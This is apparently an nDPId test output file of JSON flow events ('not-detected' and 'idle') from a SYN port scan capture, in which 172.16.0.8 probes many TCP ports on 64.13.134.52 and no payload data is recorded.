+00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 